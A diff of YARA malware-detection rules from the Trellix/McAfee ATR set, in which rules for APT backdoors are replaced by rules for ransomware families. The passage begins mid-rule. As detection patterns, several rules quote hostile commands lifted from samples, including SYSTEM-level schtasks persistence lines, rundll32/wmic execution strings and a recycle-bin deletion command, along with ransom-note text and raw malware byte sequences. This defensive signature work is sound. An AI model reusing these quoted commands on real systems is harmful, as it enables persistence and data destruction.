-		$0 = {E4B5518CD941310A015E4AF8E5968C8231492FE19246A293A569D5D7A36F56EB2FC5B68FFF6F3359C19AF6806920C3FE6628F90A75440E6616297A031BA6075100D72DFAA9829E772E45D77B89F862081EAFDB19B4B2DCEF3F273FF645ACCEAA4B991F98373973C0FB25829E860D9BC195EF1A0AD9219456AD077D42868EE03EE00E88D04C434BA97E88DF99273A35E2C668A1C69954B4762390ABDFBE4CD4AF}
-		$1 = {90506F1C825F7AE0D8605F5C627CA325BFF199AB60A63DE8A90E923F4B18D7FB039E1DEC89D573AAB0A14C1D4BA70EB444753A41C03082A60CB4DB551393F2C50988A3181E7F31D01B5AAD94070432D98F18655AB8A555919FEFEA9DE1EDF1}
-		$2 = {D5EEF61336015A85FF04ED298A6BDD6742FF153E33DAF9B383A5FFDCE7E64D47748DB5FF2609DF9BD5C66735FF6916797B2D365313FF1461EAEB9DAEA754FF6D4D55D1956CC8CBFF75C10CE74BF88C8DFF3B553B839D42609FFF2916227230}
-		$3 = {6C750DDC932124500CE9B5AB91CE101BE9AD348220E9423124512282373675152281023428825C51770FE9841F853375125382F732750A5B83F60FEB6AEE2282647462228269745AEE22826F7452228275744AEE2282787442}
-		$4 = {19A8A063FFAAAF6C1E7F78A896FFFA5C8F30BA98B69CFF1961E107BEB7636AFF9EA56A4FC4EDE3F1FF295235ACD0185726FFADA6B8CB54B342C9FF86F58524DC91617BFFB4388DBE01B6CF86}
-		$5 = {50C449606B20184A6328556032197660AAF9507861609F6160640560B4546160C3A194056070C4A09EC4A01A0461A4C4A0831B16600561916069A291607061C09160AA1CB6204A}
-		$6 = {FFEB19D2636B8B95273156BB63E8C78470D55970F47CF26574B46DE86EE084704590CA8053F15320258BBD1AACF18B04F2E965C6605CB10880B7E8FCF53DF5EB0621635EFF}
-		$7 = {7E31126E14B8FF98554F6FCFB64207FFCF8D93B2573609C2FF99E4409F73BB9322FF1E5E380DC0BBABCAFF4B901EDF61BD6A68FFEE3253728C7769ABFF7BCDA939C959A282}
-		$8 = {1970FFC6F8AA7C32EE693CFF369579E5355EF62CFF682CEAF20BA3EA1CFF1AAC638666431B20FF54293D1E709C231AFFCD11B55599F64CB9FF1E5A9015DC867F}
-		$9 = {8DFF93B2573609C299E4FF409F73BB93221E5EFF380DC0BBABCA4B90FF1EDF61BD6A68EE32FF53728C7769AB7BCDFFA939C959A282D312FF5DD04F0370CE811F}
-		$10 = {DF5519064E31101CF3DA96C15FF96728B708F358F51759E3A22FFA1CF1BB986A2038D6753E6BF037945B8469ADF20BAB71E10F3DE27735F640704C970DFE8672}
+		$s1 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"" fullword wide
+		$s2 = "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\" fullword wide
+		$s3 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide
+		$s4 = "need to do is submit the payment and get the decryption password." fullword wide
+		$s5 = "schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide
+		$s6 = "rundll32 %s,#2 %s" fullword ascii
+		$s7 = " \\\"C:\\Windows\\%s\\\" #1 " fullword wide
+		$s8 = "Readme.txt" fullword wide
+		$s9 = "wbem\\wmic.exe" fullword wide
+		$s10 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide
+		$og1 = { 39 74 24 34 74 0a 39 74 24 20 0f 84 9f }
+		$og2 = { 74 0c c7 46 18 98 dd 00 10 e9 34 f0 ff ff 8b 43 }
+		$og3 = { 8b 3d 34 d0 00 10 8d 44 24 28 50 6a 04 8d 44 24 }
+		$oh1 = { 39 5d fc 0f 84 03 01 00 00 89 45 c8 6a 34 8d 45 }
+		$oh2 = { e8 14 13 00 00 b8 ff ff ff 7f eb 5b 8b 4d 0c 85 }
+		$oh3 = { e8 7b ec ff ff 59 59 8b 75 08 8d 34 f5 48 b9 40 }
+		$oj4 = { e8 30 14 00 00 b8 ff ff ff 7f 48 83 c4 28 c3 48 }
+		$oj5 = { ff d0 48 89 45 e0 48 85 c0 0f 84 68 ff ff ff 4c }
+		$oj6 = { 85 db 75 09 48 8b 0e ff 15 34 8f 00 00 48 8b 6c }
+		$ok1 = { 74 0c c7 46 18 c8 4a 40 00 e9 34 f0 ff ff 8b 43 }
+		$ok2 = { 68 f8 6c 40 00 8d 95 e4 f9 ff ff 52 ff 15 34 40 }
+		$ok3 = { e9 ef 05 00 00 6a 10 58 3b f8 73 30 8b 45 f8 85 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) and all of ( $og* ) ) or all of ( $oh* ) or all of ( $oj* ) or all of ( $ok* )
 }
-rule TRELLIX_ARC_Karkoff_Dnspionaje : BACKDOOR FILE
+rule TRELLIX_ARC_Cryptolocker_Set1 : RANSOMWARE
 {
 	meta:
-		description = "Rule to detect the Karkoff malware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "a5cdc65f-3a4c-5d97-9d88-8d60b14dfb9a"
-		date = "2019-04-23"
+		description = "Detection of Cryptolocker Samples"
+		author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+		id = "13ccc6d3-c2cc-59ac-81af-ec11fb78cd41"
+		date = "2014-04-13"
 		modified = "2020-08-14"
-		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_karkoff_dnspionaje.yar#L1-L30"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Cryptolocker.yar#L1-L40"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c"
-		logic_hash = "79dd0087f1197cb1b2cd98416302363951479ba5ebf82289768585b56ed21c3a"
+		logic_hash = "5be8d077537a59d860a972392be186d2697e55778f750d03b0fd3b0a73f714d9"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Karkoff"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Cryptolocker"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "DropperBackdoor.Newtonsoft.Json.dll" fullword wide
-		$s2 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide
-		$s3 = "DropperBackdoor.exe" fullword wide
-		$s4 = "get_ProcessExtensionDataNames" fullword ascii
-		$s5 = "get_ProcessDictionaryKeys" fullword ascii
-		$s6 = "https://www.newtonsoft.com/json 0" fullword ascii
+		$string0 = "static"
+		$string1 = " kscdS"
+		$string2 = "Romantic"
+		$string3 = "CompanyName" wide
+		$string4 = "ProductVersion" wide
+		$string5 = "9%9R9f9q9"
+		$string6 = "IDR_VERSION1" wide
+		$string7 = "  </trustInfo>"
+		$string8 = "LookFor" wide
+		$string9 = ":n;t;y;"
+		$string10 = "        <requestedExecutionLevel level"
+		$string11 = "VS_VERSION_INFO" wide
+		$string12 = "2.0.1.0" wide
+		$string13 = "<assembly xmlns"
+		$string14 = "  <trustInfo xmlns"
+		$string15 = "srtWd@@"
+		$string16 = "515]5z5"
+		$string17 = "C:\\lZbvnoVe.exe" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		12 of ( $string* )
 }
-rule TRELLIX_ARC_APT_Winnti : BACKDOOR FILE
+rule TRELLIX_ARC_Cryptolocker_Rule2 : RANSOMWARE
 {
 	meta:
-		description = "Detects Winnti variants"
-		author = "McAfee ATR Team"
-		id = "f12b039a-2508-580f-b777-428bbda2c666"
-		date = "2020-06-04"
-		modified = "2020-10-14"
-		reference = "https://attack.mitre.org/software/S0141/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_winnti.yar#L1-L27"
+		description = "Detection of CryptoLocker Variants"
+		author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+		id = "a6e808ef-4f60-5592-9440-69309784efb1"
+		date = "2014-04-14"
+		modified = "2020-08-14"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Cryptolocker.yar#L42-L79"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "fd539d345821d9ac9b885811b1f642aa1817ba8501d47bc1de575f5bef2fbf9e"
-		logic_hash = "f94b2c552fbb30e1005e5c75a2f449d60b9558a0916197bed41bf32c6477daef"
+		logic_hash = "e8e03516cc0b669000c8d6b443be7a5f7a8b904abba98fd3c7d4f038de6741ab"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Winnti"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Cryptolocker"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern = { 9090909090909090909090909090C7????????????C2????90909090909081??????????E9????????CCCCCCCCCC8A??????8B??????538A??8A??568B??578B??????8B??C1????66????8B??C1????F3AB8B??83????F3AA8B??5F5E5BC390909090909090909090909090909083????5333??568D??????535089??????89??????E8????????8A??33??3A??8D??????0F94??83????5389??????528B??89??????C6????????E8????????8B??33??81??????????8D??????0F94??6A??89??????5223??89??????C6????????C6????????E8????????33??66????8D??????6A??0F94??89??????89??????5223??C6????????C6????????E8????????8B??83????33??3B??0F94??23??5E495BF7??1B??8B??83????C38B??????8B??????03??C390909090908B??????85??0F84????????8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??E9????????83????C39090909090909090909090909083????8B??????53558B??????33??568B??????83????5789??????76??81??????????8B??76??BF????????8B??????8D????03??C1????03??89??????3B??76??8B??????68????????6A??52E8????????8B??????8B??????8B??????505351565752E8????????8B??????8B??8B??????2B??8B??83????03??8B??????83????89??????77??03??0F84????????8B??????8B??????2B??03??3B??89??????75??81??????????77??8A??04??EB??83????77??08????EB??83????77??8A??80????88??EB??8D????C6????463D????????89??????76??8D????B8????????F7??C1????8B??33??8B??8B??C1????F3AB8B??83????03??F3AA8B??????81??????????4A89??????75??8B??????8B??88??468A??88??46424B75??8B??????C6????465FC6????46C6????2B??8B??????4633??89??5E5D5B83????C390909090909090909083????8B??????53558B??????568B??????8D????5789??????8B??????83????73??B8????????2B??EB??33??03??8B??2B??C1????8D??????89??????8B??????8B??????8D????3B??0F83????????8B??8B??69??????????8B??????8B??????C1????33??66??????03??8B??????2B??????89??????66??????8B??3B??0F85????????8B??????C7??????????????2B??8B??????8B??2B??0F84????????83????77??8A????0A??88????8B????89??03??E9????????83????77??8A??2C??88??468B????89??8B????89????8B????89????8B????89????03??E9????????83????77??8A??80????88??46EB??8D????C6????463D????????89??????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??8B??????81??????????4889??????75??8B??????8B??8B??????88??468B????89??8B????89????8B????89????8B????89????83????83????83????83????73??85??76??8A????88??46454B75??BB????????8B????8B????33??75??BB????????03??8B????8B??33??8B??????83????3B??73??8B??2B??????85??75??83????83????8B????8B??33??8B??????3B??72??EB??84??75??C1????4384??74??8B??????8B??03??2B??83????89??????77??3D????????77??4880????8A??80????C0????C0????0A??88??46C1????88??46E9????????3D????????77??4883????89??????77??80????80????EB??83????C6????4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????2D????????83????89??????77??8B??80????C1????80????8A??0A??80????88??46C0????88??46C1????88??46E9????????8B??83????C1????80????80????88??4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????8B??????E9????????8B??????8B??????8B??????2B??89??8B??5F2B??5E5D03??5B83????C390909090909090909090908B??????538B??????55568B??????C7??????????578A??8D????8B??????80????8B??76??81??????????8D????83????8B??83????0F82????????8A??88??40414F75??EB??33??8A??418B??83????0F83????????85??75??80????75??8A????81??????????4184??74??33??8A??418D??????8B??89??83????83????4E74??83????72??8B??89??83????83????83????83????73??85??76??8A??88??40414E75??EB??8A??88??40414E75??33??8A??418B??83????73??33??8B??8A??C1????2B??C1????2B??8A??????????81??????????4188??40478A??88??8A????4088??408A????83????8B??0F84????????8A??88??404183????76??8A??88??404183????76??8A??88??404133??8A??418B??83????72??8B??8B??C1????83????2B??33??8A??C1????2B??4F41C1????4E8A??88??8A????404788??40478A??88??40474E75??EB??83????72??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????8D????66????81??????????C1????2B??83????EB??83????0F82????????8B??8B??83????C1????2B??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????66????81??????????C1????2B??83????3B??74??81??????????83????0F82????????8B??2B??83????0F8C????????8B??89??83????83????83????8B??89??83????83????83????83????73??85??0F86????????8A??88??40474E75??E9????????33??8B??8A??C1????2B??C1????2B??4F41E9????????8B??????2B??3B??89??75??5F5E5D33??5BC31B??5F24??5E5D83????5BC39090909090909090909090909081??????????568B??68????????C7??????????FF??????????83????75??57B9????????33??8D??????66????????????F3AB66AB8D??????5068????????FF??????????83????5F75??6A??68????????FF??????????8B??5E81??????????C390909090909090909090909090568B??E8????????F6????????74??56E8????????83????8B??5EC2????909068????????C7??????????FF??????????85??75??FF??????????C39090909053558B??????5685??5774??8B??????85??74??33??33??33??85??76??8A??????????8A??????????32??80????32??8A????32??33??88????8D????BE????????F7??8D????BF????????8B??33??F7??413B??8B??72??5F5E5D5BC39083????538B??????55565768????????68????????5333??FF??????????8B??85??0F84????????68????????FF??????????8B??B0??88??????88??????8D??????B1??5056C6????????88??????C6????????C6????????C6????????C6????????88??????C6????????C6????????C6????????C6????????FF??????????5753FF??568B??FF??????????85??74??57FF??????????8B??8B??????B9????????8B??68????????50F3A5E8????????83????B8????????5F5E5D5B83????C35F8B??5E5D5B83????C39090538B??????????5657C7??????????8D????BF???????? }
+		$string0 = "2.0.1.7" wide
+		$string1 = "    <security>"
+		$string2 = "Romantic"
+		$string3 = "ProductVersion" wide
+		$string4 = "9%9R9f9q9"
+		$string5 = "IDR_VERSION1" wide
+		$string6 = "button"
+		$string7 = "    </security>"
+		$string8 = "VFileInfo" wide
+		$string9 = "LookFor" wide
+		$string10 = "      </requestedPrivileges>"
+		$string11 = " uiAccess"
+		$string12 = "  <trustInfo xmlns"
+		$string13 = "last.inf"
+		$string14 = " manifestVersion"
+		$string15 = "FFFF04E3" wide
+		$string16 = "3,31363H3P3m3u3z3"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		12 of ( $string* )
 }
-rule TRELLIX_ARC_Ixeshe_Bled_Malware_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Crime_Ransomware_Windows_Gpgqwerty : RANSOMWARE
 {
 	meta:
-		description = "Rule to detect Ixeshe_bled malware based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "93356eab-5bb3-5b85-acc6-9a247554aa2d"
-		date = "2012-05-30"
+		description = "Detect GPGQwerty ransomware"
+		author = "McAfee Labs"
+		id = "dcbaf3bd-7d0c-5449-a751-82caaad3b5c2"
+		date = "2018-03-21"
 		modified = "2020-08-14"
-		reference = "https://attack.mitre.org/software/S0015/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/ixeshe_bled_pdb.yar#L1-L24"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/ransomware-takes-open-source-path-encrypts-gnu-privacy-guard/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_GPGQwerty.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "d1be51ef9a873de85fb566d157b034234377a4a1f24dfaf670e6b94b29f35482"
-		logic_hash = "7d2ce7644e25a56c101c148a32f7b0f7c3185c0c17f4d65eaef257f6ac7f8ffb"
+		logic_hash = "8e77895cb8e7f33707c5080780a49cb4bf1d35aa7a8df829fdc7a93319ce3897"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Ixeshe"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/GPGQwerty"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\code\\Blade2009.6.30\\Blade2009.6.30\\EdgeEXE_20003OC\\Debug\\EdgeEXE.pdb"
+		$a = "gpg.exe –recipient qwerty  -o"
+		$b = "%s%s.%d.qwerty"
+		$c = "del /Q /F /S %s$recycle.bin"
+		$d = "cryz1@protonmail.com"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and any of them
+		all of them
 }
-
-rule TRELLIX_ARC_Shadowspawn_Utility : UTILITY FILE
+rule TRELLIX_ARC_RANSOM_Exorcist : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect ShadowSpawn utility used in the SoftCell operation"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "0a325f5c-2750-5354-b920-f7e1510a8b71"
-		date = "2019-06-25"
-		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L3-L32"
+		description = "Rule to detect Exorcist"
+		author = "McAfee ATR Team"
+		id = "38ab069d-b030-5459-a42f-7ecd5963e68f"
+		date = "2020-09-01"
+		modified = "2020-10-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Exorcist.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "0f2805aee60cdb4eb932768849c845052c92131d0b25a511b822b79b2ac93e24"
+		logic_hash = "c376382e60aae0f661151495097d3d93f185faebb11781dbf083324c23a07247"
 		score = 75
 		quality = 70
-		tags = "UTILITY, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "utility"
-		malware_family = "Trojan:W32/ShadowSpawn"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransomware:W32/Exorcist"
+		actor_type = "Cybercrime"
+		hash1 = "793dcc731fa2c6f7406fd52c7ac43926ac23e39badce09677128cce0192e19b0"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "C:\\data\\projects\\shadowspawn\\src\\bin\\Release-W2K3\\x64\\ShadowSpawn.pdb" fullword ascii
-		$op0 = { e9 34 ea ff ff cc cc cc cc 48 8d 8a 20 }
-		$op1 = { 48 8b 85 e0 06 00 00 48 8d 34 00 48 8d 46 02 48 }
-		$op2 = { e9 34 c1 ff ff cc cc cc cc 48 8b 8a 68 }
+		$sq1 = { 48 8B C4 48 89 58 08 48 89 70 10 48 89 78 18 4C 89 60 20 55 41 56 41 57 48 8D 68 A1 48 81 EC 90 00 00 00 49 8B F1 49 8B F8 4C 8B FA 48 8B D9 E8 ?? ?? ?? ?? 45 33 E4 85 C0 0F 85 B1 00 00 00 48 8B D7 48 8B CB E8 9E 02 00 00 85 C0 0F 85 9E 00 00 00 33 D2 48 8B CB E8 ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 45 8D 44 24 01 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8B CB 48 8B F8 FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 E8 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 4C 8B F0 48 8D 48 FF 48 83 F9 FD 77 25 48 8D 55 2F 48 8B C8 FF 15 ?? ?? ?? ?? 4C 39 65 2F 75 3B 49 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 4C 8D 9C 24 90 00 00 00 49 8B 5B 20 49 8B 73 28 49 8B 7B 30 4D 8B 63 38 49 8B E3 41 5F 41 5E 5D C3 48 8D 45 FB 4C 89 65 1F 4C 8D 4D FF 48 89 44 24 20 4C 8B C6 4C 89 65 07 48 8D 55 07 4C 89 65 FF 48 8D 4D 1F 44 89 65 FB E8 ?? ?? ?? ?? 45 33 C9 4C 8D 05 3C F5 FF FF 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 8D 55 17 49 8B CE FF 15 ?? ?? ?? ?? 49 8B CE 44 89 65 F7 E8 ?? ?? ?? ?? 49 8B F4 4C 89 65 0F 4C 39 65 17 0F 8E 9D 00 00 00 C1 E0 10 44 8B F8 F0 FF 45 F7 B9 50 00 00 00 E8 ?? ?? ?? ?? 8B 4D 13 48 8B D8 89 48 14 89 70 10 4C 89 60 18 44 89 60 28 4C 89 70 30 48 8B 4D 07 48 89 48 48 48 8D 45 F7 B9 00 00 01 00 48 89 43 40 E8 ?? ?? ?? ?? 33 D2 48 89 43 20 41 B8 00 00 01 00 48 8B C8 E8 ?? ?? ?? ?? 48 8B 53 20 4C 8D 4B 38 41 B8 00 00 01 00 48 89 5C 24 20 49 8B CE FF 15 ?? ?? ?? ?? EB 08 33 C9 FF 15 ?? ?? ?? ?? 8B 45 F7 3D E8 03 00 00 77 EE 49 03 F7 48 89 75 0F 48 3B 75 17 0F 8C 6B FF FF FF EB 03 8B 45 F7 85 C0 74 0E 33 C9 FF 15 ?? ?? ?? ?? 44 39 65 F7 77 F2 48 8B 4D 07 E8 ?? ?? ?? ?? 48 8B 4D 1F 33 D2 E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 00 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 8D 48 FF 48 83 F9 FD 77 51 48 8D 55 37 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B 55 37 45 33 C9 45 33 C0 48 8B CB FF 15 ?? ?? ?? ?? 44 8B 45 FB 4C 8D 4D 27 48 8B 55 FF 48 8B CB 4C 89 64 24 20 FF 15 ?? ?? ?? ?? 48 8B 4D FF E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? E9 14 FE FF FF 48 8B CF E8 ?? ?? ?? ?? 48 8B 4D FF E9 06 FE FF FF }
+		$sq2 = { 48 8B C4 48 81 EC 38 01 00 00 48 8D 50 08 C7 40 08 04 01 00 00 48 8D 4C 24 20 FF 15 ?? ?? ?? ?? 48 8D 4C 24 20 E8 ?? ?? ?? ?? 48 81 C4 38 01 00 00 C3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "eaae87b11d2ebdd286af419682037b4c" and all of them )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-
-rule TRELLIX_ARC_Poison_Ivy_Softcell : RAT FILE
+rule TRELLIX_ARC_RANSOM_Suncrypt : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Poison Ivy used in the SoftCell operation"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "c362b116-4cb6-5393-9c64-28e8d2886dc7"
-		date = "2019-06-25"
-		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L34-L72"
+		description = "Rule to detect SunCrypt ransomware"
+		author = "McAfee ATR Team"
+		id = "92655f3e-f8e4-5c9f-ae3f-0796bd31d660"
+		date = "2020-10-02"
+		modified = "2020-11-02"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Suncrypt.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "ac84023404d76adf8cfd8d26bb59fb51f29057748806c4f5ea0634803fd937cd"
+		logic_hash = "9f27c6c5bfe0d01ed517d55687bf699814679488f95ce4942306f09f39e29d85"
 		score = 75
 		quality = 70
-		tags = "RAT, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "rat"
-		malware_family = "Rat:W32/PoisonIvy"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransomware:W32/Suncrypt"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80"
+		hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806"
 
 	strings:
-		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
-		$s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
-		$s3 = "&Enter password for the encrypted file:" fullword wide
-		$s4 = "start \"\" \"%CD%\\mcoemcpy.exe\"" fullword ascii
-		$s5 = "setup.bat" fullword ascii
-		$s6 = "ErroraErrors encountered while performing the operation" fullword wide
-		$s7 = "Please download a fresh copy and retry the installation" fullword wide
-		$s8 = "antivir.dat" fullword ascii
-		$s9 = "The required volume is absent2The archive is either in unknown format or damaged" fullword wide
-		$s10 = "=Total path and file name length must not exceed %d characters" fullword wide
-		$s11 = "Please close all applications, reboot Windows and restart this installation\\Some installation files are corrupt." fullword wide
-		$op0 = { e8 6f 12 00 00 84 c0 74 04 32 c0 eb 34 56 ff 75 }
-		$op1 = { 53 68 b0 34 41 00 57 e8 61 44 00 00 57 e8 31 44 }
-		$op2 = { 56 ff 75 08 8d b5 f4 ef ff ff e8 17 ff ff ff 8d }
+		$pattern = { 77??2F475263????78??58436463????77??7A??5263????78??5846534D5A4678??48475263??????6B??????4D5A4679??7A??5263????78??584C5163????7A??44475264??5778??58526163????30????475264??30????58556463????31????475264??73??6B??????63????32????4752646C73??6B??????38????32??5047526477??6A??5738????68????????41555039????496C46374931????46446F62????414146442F565169????????????5039????466D4A526669??????????64??63????4F6D38????414169??????????586F69??????????33????30????69????????????6F41444141414974??38????41554542516167??2F5665??4478??434A526679??6666????64??63????4F6D444141414169??????????33??69????????????77??33????2F33????2F33????36??49464141434478??7A??64667A??64??7A??64??6A??73??7A??2F34??454449584164??517A??4F74??69??????????5834??5558672F33????2F33????36??6E362F2F39????59584164??517A??4F73??69??????????33??69????????????554B30????69????????????30????5838????5830????5549554974??4446434C525268????????30??39????77??444A77??574C37495073??4D5A4634??62????65??70??6B??????73??4634??54475265??31????586C5963????35????????65????78??586F63????4636??2F47526570??78??5872??63????37475047526531??78??5875??4931????46446F534163????46442F565169????????????66??51616B??????52434C51416A??63????4C5252442F63????2F566679??78??434677??55454D38??????475368????????41496C462B????462B????4E454974??49496C49434974??454974??434974??454974??49414E494B496C4E39????4639????517A??5041514D6E44565976??555974??434974??434974??434974??494474??4E4855464D38????367A??4C525169??????????????6C72??51574466??68????????454D38??????6F74??434974??434974??434974??494374??4E496C4E2F5039??2F4974??435039????4F6A??2B????2F57566E4A77??574C37494873??41414141494E6C6C4143445A6141416733??514148554969??????????30??????44475266??75??6B??????4D5A4638????475266??73??6B??????4D5A4639????475266??6B??????33????5A462B????4752666B??????5867??73??4634??6E475265??79??6B??????4D5A4635????????65??68????????62????4635????????65??????????70??63????366E4C47526574??78??5873??4D5A4630????475264??70??6B??????73??4630??54475264??31????58565963????31????475264????78??585962????4632????47526470??78??5862????5A4633????475262????78??5739????5A4676??54475262??4478??58416463????77??4C475263????78??58445A63????78??37475263????78??5847554D5A4678??4C475263????78??584A5938????79??58475263??????6B??????38????7A??44475261526178??576C64??????70??584752616475??6B??????63????71??4847526170??78??5772??73??4672??6E47526131??????5775??38????72??2F475262????78??5778??38????73??58475262????78??5730??????4674??6E475262????78??5733????5A4675??434E5265??5136??4D46414142512F31????69????????????51554F677A??514141555039????496C466E4931????46446F4977??414146442F565169????????????6152516A??5877??5039????46442F565169????????????52434C514269??????